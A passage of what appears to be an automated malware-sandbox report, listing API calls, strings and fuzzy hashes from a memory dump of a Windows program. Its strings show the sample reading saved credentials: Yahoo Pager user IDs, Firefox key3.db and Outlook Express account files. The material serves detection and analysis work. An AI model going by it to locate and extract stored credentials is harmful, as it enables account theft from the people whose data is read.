                                                                                                                                                                • memset.MSVCRT ref: 00444573
                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValuememset
                                                                                                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                • API String ID: 1830152886-1703613266
                                                                                                                                                                • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 00406D87
                                                                                                                                                                • sprintf.MSVCRT ref: 00406DAF
                                                                                                                                                                • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastMessagesprintf
                                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                                • API String ID: 1670431679-1552265934
                                                                                                                                                                • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                                • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: H
                                                                                                                                                                • API String ID: 2221118986-2852464175
                                                                                                                                                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                • API String ID: 3510742995-3170954634
                                                                                                                                                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                                • API String ID: 231171946-3708268960
                                                                                                                                                                • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                • String ID: winWrite1$winWrite2
                                                                                                                                                                • API String ID: 438689982-3457389245
                                                                                                                                                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                • String ID: winRead
                                                                                                                                                                • API String ID: 1297977491-2759563040
                                                                                                                                                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                • String ID: gj
                                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76DC0A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76DC0A60), ref: 00406D4D
                                                                                                                                                                • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                  • Part of subcall function 00411004: memcpy.MSVCRT ref: 00411072
                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                • API String ID: 3337535707-2769808009
                                                                                                                                                                • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                                • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                                                                • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2374668499-0
                                                                                                                                                                • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76DC0A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76DC0A60), ref: 00406D4D
                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                Strings
                                                                                                                                                                • <%s>, xrefs: 0040ADA2
                                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                • API String ID: 3699762281-1998499579
                                                                                                                                                                • Opcode ID: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                                                                                                • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                                                                • Opcode Fuzzy Hash: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                                                                                                • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                                                                • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                                                                • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                                                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                                                                                                                                                                  • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                                                                • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2775283111-0
                                                                                                                                                                • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                                                                                  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                                                                                                                                                                  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                • String ID: Ul@$key3.db
                                                                                                                                                                • API String ID: 1968906679-1563549157
                                                                                                                                                                • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strcmpi$_mbscpy
                                                                                                                                                                • String ID: smtp
                                                                                                                                                                • API String ID: 2625860049-60245459
                                                                                                                                                                • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
